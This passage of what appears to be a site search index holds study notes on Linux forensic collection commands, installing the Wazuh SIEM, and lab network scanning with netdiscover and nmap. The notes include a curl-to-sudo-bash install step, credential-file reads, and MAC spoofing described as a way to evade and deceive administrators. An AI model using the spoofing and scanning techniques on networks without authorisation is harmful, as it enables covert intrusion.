","permalink":"https://0x-s0M3n4th.github.io/notes/miscellaneous/int-250/linux-forensics/","summary":"\u003ch2 id=\"volatile\"\u003eVolatile:\u003c/h2\u003e\n\u003ch3 id=\"collecting-hostname-date-and-time\"\u003eCollecting hostname, date and time:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ehostname\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ehostnamectl\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003edate\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /etc/timezone\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003etimedatectl\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"lf_1\" loading=\"lazy\" src=\"/images/UNI_PRACS/INT_250/prac_2/lf_1.png\"\u003e\n\u003cimg alt=\"lf_2\" loading=\"lazy\" src=\"/images/UNI_PRACS/INT_250/prac_2/lf_2.png\"\u003e\u003c/p\u003e\n\u003ch3 id=\"epoch-time\"\u003eepoch time:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003edate +%s\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"system-uptime\"\u003esystem uptime:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003euptime\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"network-information\"\u003eNetwork 
information:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eip a \u003cspan class=\"c1\"\u003e# short form of ip addr show\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eifconfig \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# promisc mode detection:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eifconfig eth0\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eip link show eth0\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# other network info commands:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enetstat -i \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enetstat -rn \u003cspan class=\"c1\"\u003e# routing tables\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eip r \u003cspan class=\"c1\"\u003e# routing tables\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"open-port-info\"\u003eopen port info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sT 
localhost\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sU localhost \u003cspan class=\"c1\"\u003e# UDP port\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo lsof -i tcp \u003cspan class=\"c1\"\u003e# checking tcp listening connections of localhost\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo lsof -n -P \u003cspan class=\"p\"\u003e|\u003c/span\u003e grep LISTEN\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enetstat -tulpn\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"listing-current-users-open-processes\"\u003elisting current user\u0026rsquo;s open processes:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo lsof -u user_name\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"mounted-file-system-info\"\u003emounted file system info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emount \u003cspan class=\"c1\"\u003e# info about file systems\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003edf -h \u003cspan class=\"c1\"\u003e# file systems info but in human readable 
format\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"kernel-module-info-sound-driver-info\"\u003ekernel module info, sound driver info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emodinfo ufs \u003cspan class=\"c1\"\u003e# kernel module\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emodinfo snd \u003cspan class=\"c1\"\u003e# sound module info\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"user-event-collection\"\u003euser event collection:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eid\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"reading-elf-file\"\u003eReading ELF file:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ereadelf -h file_name \u003cspan class=\"c1\"\u003e# file header reading\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"running-processes\"\u003erunning processes:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eps aux -ww\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"swap-area-and-disk-partition-info\"\u003eswap 
area and disk partition info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /proc/partitions \u003cspan class=\"c1\"\u003e# disk partition\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /proc/swaps \u003cspan class=\"c1\"\u003e# swap info\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"kernel-message---kernel-ring-buffer-info\"\u003ekernel message - kernel ring buffer info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003edmesg\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"non-volatile\"\u003eNon-volatile:\u003c/h2\u003e\n\u003ch3 id=\"collecting-system-info\"\u003eCollecting system info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /proc/cpuinfo\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /proc/self/mounts\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"kernel-info\"\u003ekernel info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003euname -r\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /proc/version\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
class=\"line\"\u003e\u003cspan class=\"cl\"\u003ehostnamectl \u003cspan class=\"p\"\u003e|\u003c/span\u003e grep Kernel\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"local-user-account-information\"\u003elocal user account information:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /etc/passwd \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /etc/passwd \u003cspan class=\"p\"\u003e|\u003c/span\u003e cut -d: -f1 \u003cspan class=\"c1\"\u003e# separating the user names from the output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"logged-on-user-information\"\u003elogged on user information:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ew\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003elast \u003cspan class=\"c1\"\u003e# login history information (read from /var/log/wtmp)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"collecting-system-logs\"\u003ecollecting system logs:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /var/log/syslog\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /var/log/kern.log \u003cspan class=\"c1\"\u003e# linux kernel logs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat 
/var/log/fail.log\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /var/log/mail.*\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /var/log/mysql.*\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /var/log/daemon.log\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecat /var/log/debug\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ejournalctl\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"history-and-hidden-file-information\"\u003ehistory and hidden file information:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003ehistory\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003els -al \u003cspan class=\"c1\"\u003e# hidden files\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"suspicious-info\"\u003esuspicious info:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo rkhunter --check --rwo\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo chkrootkit \u003cspan class=\"c1\"\u003e# rootkit checker\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"file-signature-analysis\"\u003efile signature 
analysis:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003exxd file_name \u003cspan class=\"p\"\u003e|\u003c/span\u003e head -n \u003cspan class=\"m\"\u003e10\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"basic-file-information\"\u003ebasic file information:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003efile file_name\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003estrings -t d file_name \u003cspan class=\"c1\"\u003e# printable strings with their decimal file offsets\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# files under /var/log that the current user can write to (an attacker with such access can tamper with the logs):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003efind / -writable -type f 2\u0026gt; /dev/null \u003cspan class=\"p\"\u003e|\u003c/span\u003e grep \u003cspan class=\"s2\"\u003e\u0026#34;/var/log\u0026#34;\u003c/span\u003e \n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"directory-permission-checking\"\u003eDirectory permission checking:\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003els -ld Desktop\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"file-system-analysis-using-the-sleuth-kit\"\u003eFile system analysis using The Sleuth 
Kit:\u003c/h2\u003e\n\u003ch3 id=\"creating-an-file-system-image-using-dd\"\u003eCreating a file system image using dd:\u003c/h3\u003e\n\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition important\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 512 512\"\u003e\u003cpath d=\"M256 512A256 256 0 1 0 256 0a256 256 0 1 0 0 512zm0-384c13.3 0 24 10.7 24 24l0 112c0 13.3-10.7 24-24 24s-24-10.7-24-24l0-112c0-13.3 10.7-24 24-24zM224 352a32 32 0 1 1 64 0 32 32 0 1 1 -64 0z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eImportant\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eBefore that, add a 1 GB virtual hard disk to your VM for testing purposes through VMware -\u0026gt; VM settings -\u0026gt; Add -\u0026gt; Hard disk -\u0026gt; SCSI -\u0026gt; Create new virtual disk -\u0026gt; 1 GB -\u0026gt; Done.\u003c/p\u003e","title":"Practical Demo: Linux Forensics"},{"content":" Installing Wazuh on Ubuntu 20.04 LTS step 1: curl -sO https://packages.wazuh.com/4.12/wazuh-install.sh \u0026amp;\u0026amp; sudo bash ./wazuh-install.sh -a This takes some time and installs all Wazuh components (indexer, manager and dashboard); at the end it prints the dashboard username and password and the port it listens on. Then disable the Wazuh apt repository so that a routine apt upgrade does not upgrade the Wazuh packages by accident -\u0026gt; sudo sed -i \u0026#34;s/^deb /#deb /\u0026#34; /etc/apt/sources.list.d/wazuh.list sudo apt update Note You can find the passwords for all the Wazuh indexer and Wazuh API users in the wazuh-passwords.txt file inside wazuh-install-files.tar. 
To print them run the following command -\u0026gt;\nsudo tar -O -xvf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt Now I will set up the Wazuh agent on a Windows machine. First download the Wazuh agent installer for Windows from the documentation page -\u0026gt; wazuh-agent Then run this in a command prompt on the Windows machine (the agent must be able to reach the manager on TCP 1515 for enrollment and TCP 1514 for events): cd Downloads wazuh-agent-4.12.0-1.msi /q WAZUH_MANAGER=\u0026#34;wazuh_manager_IP\u0026#34; For PowerShell -\u0026gt; msiexec.exe /i .\\wazuh-agent-4.12.0-1.msi /q WAZUH_MANAGER=\u0026#34;wazuh_manager_ip\u0026#34; Or double-click the installer, enter the Wazuh manager IP address -\u0026gt; click Manage -\u0026gt; Start On the Wazuh dashboard on the Ubuntu manager, refresh the Agents page and you should see your agent reporting as active -\u0026gt; ","permalink":"https://0x-s0M3n4th.github.io/notes/blue-team-ops/02-wazuh/00-introduction-+-installation/","summary":"\u003cp\u003e\u003cimg alt=\"WAZUH_INTRO_1\" loading=\"lazy\" src=\"/images/WAZUH_TUT/WAZUH_INTRO_1.png\"\u003e\n\u003cimg alt=\"WAZUH_INTRO_2\" loading=\"lazy\" src=\"/images/WAZUH_TUT/WAZUH_INTRO_2.png\"\u003e\n\u003cimg alt=\"WAZUH_INTRO_3\" loading=\"lazy\" src=\"/images/WAZUH_TUT/WAZUH_INTRO_3.png\"\u003e\n\u003cimg alt=\"WAZUH_INTRO_4\" loading=\"lazy\" src=\"/images/WAZUH_TUT/WAZUH_INTRO_4.png\"\u003e\n\u003cimg alt=\"WAZUH_INTRO_5\" loading=\"lazy\" src=\"/images/WAZUH_TUT/WAZUH_INTRO_5.png\"\u003e\u003c/p\u003e\n\u003ch1 id=\"installing-wazuh-in-ubuntu-2004-lts\"\u003eInstalling Wazuh on Ubuntu 20.04 LTS\u003c/h1\u003e\n\u003col\u003e\n\u003cli\u003estep 1:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecurl -sO https://packages.wazuh.com/4.12/wazuh-install.sh \u003cspan class=\"o\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e sudo bash ./wazuh-install.sh 
-a\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col start=\"2\"\u003e\n\u003cli\u003eThis will take some time, and it will install all wazuh services, at the end it will provide the username and password of the wazuh server as well as in which port it is running.\n![[Pasted image 20250725160156.png]]\u003c/li\u003e\n\u003cli\u003eThen you need to disable auto update wazuh using this command -\u0026gt;\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esed -i \u003cspan class=\"s2\"\u003e\u0026#34;s/^deb /#deb /\u0026#34;\u003c/span\u003e /etc/apt/sources.list.d/wazuh.list\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eapt update\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition note\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 576 512\"\u003e\u003cpath d=\"M0 64C0 28.7 28.7 0 64 0L224 0l0 128c0 17.7 14.3 32 32 32l128 0 0 125.7-86.8 86.8c-10.3 10.3-17.5 23.1-21 37.2l-18.7 74.9c-2.3 9.2-1.8 18.8 1.3 27.5L64 512c-35.3 0-64-28.7-64-64L0 64zm384 64l-128 0L256 0 384 128zM549.8 235.7l14.4 14.4c15.6 15.6 15.6 40.9 0 56.6l-29.4 29.4-71-71 29.4-29.4c15.6-15.6 40.9-15.6 56.6 0zM311.9 417L441.1 287.8l71 71L382.9 487.9c-4.1 4.1-9.2 7-14.9 8.4l-60.1 15c-5.5 1.4-11.2-.2-15.2-4.2s-5.6-9.7-4.2-15.2l15-60.1c1.4-5.6 4.3-10.8 8.4-14.9z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eNote\u003c/span\u003e\n      \u003c/div\u003e\n     
 \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eYou can find the passwords for all the Wazuh indexer and Wazuh API users in the \u003ccode\u003ewazuh-passwords.txt\u003c/code\u003e file inside \u003ccode\u003ewazuh-install-files.tar\u003c/code\u003e. To print them run the following command -\u0026gt;\u003c/p\u003e","title":"Practical Wazuh"},{"content":"During the reconnaissance phase, penetration testers will eventually need to directly engage the target by performing an active information gathering technique known as scanning. Scanning is a technique that\u0026rsquo;s used to discover live systems on a network, identify the open service ports on a system, and discover vulnerabilities on host machines and even their operating system architecture. The information that\u0026rsquo;s gathered from scanning helps the penetration tester gain a clearer view of their targets compared to passive information gathering. When we perform these scans we are likely to be blocked, or at least logged, by firewalls and intrusion detection systems MAC address spoofing: When connecting to a wired or wireless network, your Network Interface Card (NIC) contains a burned-in address known as a Media Access Control (MAC) address, which is unique to each device. When your NIC sends traffic out on a network, your MAC address is also inserted within the frame header, and this information can be used to identify your machine on a network. As an aspiring penetration tester, you can change the MAC address on both your Ethernet and wireless network adapters by using a pre-installed tool known as macchanger. Changing your MAC address allows you to pretend to be a different device, such as a network device, a printer, or a vendor-specific device on the network. 
This technique can be used to protect the identity of your attacker machine while on an organization\u0026rsquo;s network, and it can also trick the network administrators into thinking your attacker machine is one of their existing end devices.\nIdentify your initial MAC address using the command ifconfig Note down your initial address We will take the interface eth0 down sudo ifconfig eth0 down Now we will use the tool macchanger to spoof our MAC address (-A picks a random address with a real vendor prefix, so it does not stand out as spoofed; -r would set a fully random one) sudo macchanger -A eth0 sudo ifconfig eth0 up Confirm that the MAC address has changed with the command ifconfig\nLastly, to verify the vendor the spoofed MAC address maps to, go to Mac-vendors and enter the MAC address\nDiscovering live systems on a network: Discovering live hosts on the network is an essential stage when performing a penetration test. Let\u0026rsquo;s imagine you\u0026rsquo;re an ethical hacker or a penetration tester; your target organization permits you to directly connect your attacker machine with Kali Linux on their network to perform security testing from their internal network. You\u0026rsquo;re eager to start discovering security vulnerabilities and hacking systems, but you\u0026rsquo;re not sure which systems are online, nor their host operating systems. GUIDELINES FOR PERFORMING LIVE SYSTEM SCANNING:\nEnsure you do not scan systems that you do not own or have not been given explicit legal permission to test. Before any of this we need to set up our target Metasploitable 2 machine and add it to the PENTEST-NET; by default it is on NAT Note Most likely in your case you have already added Metasploitable 2 either to the vmnet2 network (which is 172.30.1.0/24) or to NAT. If so, you don\u0026rsquo;t need to do these manual steps. I forgot to do so, which is why I had to enable it manually. If you are still having issues you can follow these steps or troubleshoot in your own way.\nTO DO THIS:\nOpen the VM first and log in using msfadmin as both username and password. 
Then use the following commands: sudo nano /etc/network/interfaces We need to add a second interface (eth2 here); write the following into the config file: # The loopback network interface auto lo iface lo inet loopback # The primary network interface (DHCP) auto eth0 iface eth0 inet dhcp # The secondary interface for the lab (Static) auto eth2 iface eth2 inet static address 172.30.1.134 netmask 255.255.255.0 Save and exit nano: press Ctrl+X, then Y, then Enter. Restart the networking service: sudo /etc/init.d/networking restart and confirm the new address with ip a Now we can start our task Next, let\u0026rsquo;s use Netdiscover to perform an active scan of the entire network: sudo netdiscover -r 172.30.1.0/24 Picked up Metasploitable 2 What is netdiscover? Netdiscover is a scanning tool that uses Address Resolution Protocol (ARP) messages to identify live systems on a network; because ARP is answered by every host on the segment regardless of host firewall rules, it finds machines that drop ICMP. The -r option specifies the range to scan. Tip You can perform a passive scan of the network using the -p option, which makes Netdiscover only listen for ARP traffic exchanged between hosts on the network without sending anything itself.\nNext, let\u0026rsquo;s use Network Mapper (Nmap) to scan the entire network while excluding our Kali Linux machine by using the following command: nmap -sn 172.30.1.0/24 --exclude 172.30.1.130 The -sn option tells Nmap to perform host discovery only (a ping sweep) and skip the port scan. Against a remote network this means an Internet Control Message Protocol (ICMP) Echo Request to every address in the range (and, when run as root, also a TCP SYN to port 443, a TCP ACK to port 80 and an ICMP timestamp request); online devices typically answer with an ICMP Echo Reply. On the local Ethernet segment, as root, Nmap uses ARP requests instead, which is why it still finds hosts that block ICMP. The --exclude option specifies IP addresses to leave out of the scan. 
This option is essential when the rules of engagement exclude particular IP addresses or subnets from scanning during a penetration test.\nUsing sipcalc to work out the scan range: sipcalc is a subnet calculator rather than a host discovery tool; it prints the network address, broadcast address and usable host range for a CIDR block, which is useful for confirming the scope before handing a range to Netdiscover or Nmap. Installation: sudo apt install -y sipcalc Usage: sipcalc 172.30.1.0/24 ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/03-active-scanning-techniques/","summary":"\u003cp\u003eDuring the reconnaissance phase, penetration testers will eventually need to directly engage the target by performing an active information gathering technique known as scanning. Scanning is a technique that\u0026rsquo;s used to discover live systems on a network, identify the open service ports on a system, and discover vulnerabilities on host machines and even their operating system architecture. The information that\u0026rsquo;s gathered from scanning helps the penetration tester gain a clearer view of their targets compared to passive information gathering.\nWhen we perform these scans we are likely to be blocked, or at least 